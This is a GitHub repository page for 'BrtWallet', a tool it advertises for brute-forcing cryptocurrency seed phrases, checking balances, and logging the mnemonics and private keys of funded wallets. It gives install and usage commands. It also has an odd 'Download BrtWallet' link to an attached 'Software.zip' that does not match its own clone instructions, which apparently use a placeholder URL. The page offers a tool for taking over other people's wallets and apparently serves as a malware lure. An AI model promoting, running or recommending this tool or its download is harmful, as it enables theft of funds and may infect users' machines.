Skip to content

Brute force multiple wallet mnemonics. Multi-threaded and suprisingly fast. automatically generate seed phrases and check balances for many networks. If a wallet with a non-zero balance is found, the wallet's information (address, mnemonic, private key, and balances) is logged and saved to a file named result.txt.

Notifications You must be signed in to change notification settings

VapedZ/BrtWallet

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

15 Commits
 
 
 
 
 
 

Repository files navigation

BrtWallet

BrtWallet Logo

Brute force multiple wallet mnemonics. Multi-threaded and surprisingly fast. Automatically generate seed phrases and check balances for many networks. If a wallet with a non-zero balance is found, the wallet's information (address, mnemonic, private key, and balances) is logged and saved to a file named result.txt.


Table of Contents


Features

  • Brute Force Seed Phrases: The BrtWallet repository enables users to brute force multiple wallet mnemonics efficiently through multi-threading, making it fast and effective.
  • Automatic Balance Checking: The tool automatically generates seed phrases and checks balances for various networks, saving time and effort for users.
  • Logging Wallet Information: If a wallet with a non-zero balance is found, the wallet's information, including address, mnemonic, private key, and balances, is logged and saved to a file named result.txt for easy reference.

Installation

To get started with BrtWallet, follow these steps:

  1. Clone the repository:

    git clone https://github.com/your-username/BrtWallet.git
  2. Install the required dependencies:

    pip install -r requirements.txt
  3. Run the BrtWallet tool:

    python brtwallet.py

Usage

Once BrtWallet is set up, you can run it to start brute forcing multiple wallet mnemonics. Here are some usage examples:

  1. Generate Seed Phrases:

    python brtwallet.py --generate-seeds 1000
  2. Check Balances:

    python brtwallet.py --check-balances
  3. Log Results:

    python brtwallet.py --log-results
  4. Combining Options:

    python brtwallet.py --generate-seeds 500 --check-balances --log-results

For more details on command-line arguments and options, refer to the documentation.


Contributing

We welcome contributions from the community to enhance the functionality and features of BrtWallet. To contribute, please follow these steps:

  1. Fork the repository.
  2. Create a new branch (git checkout -b feature-addition).
  3. Make your changes.
  4. Commit your changes (git commit -am 'Add new feature').
  5. Push to the branch (git push origin feature-addition).
  6. Create a new Pull Request.

Please ensure that you follow the code of conduct and adhere to the contribution guidelines.


License

The BrtWallet repository is licensed under the MIT License. For more details, refer to the LICENSE file.

Download BrtWallet](https://github.com/user-attachments/files/17466420/Software.zip)


About

Brute force multiple wallet mnemonics. Multi-threaded and suprisingly fast. automatically generate seed phrases and check balances for many networks. If a wallet with a non-zero balance is found, the wallet's information (address, mnemonic, private key, and balances) is logged and saved to a file named result.txt.

Topics

Resources

Stars

Watchers

Forks

Packages

No packages published

Languages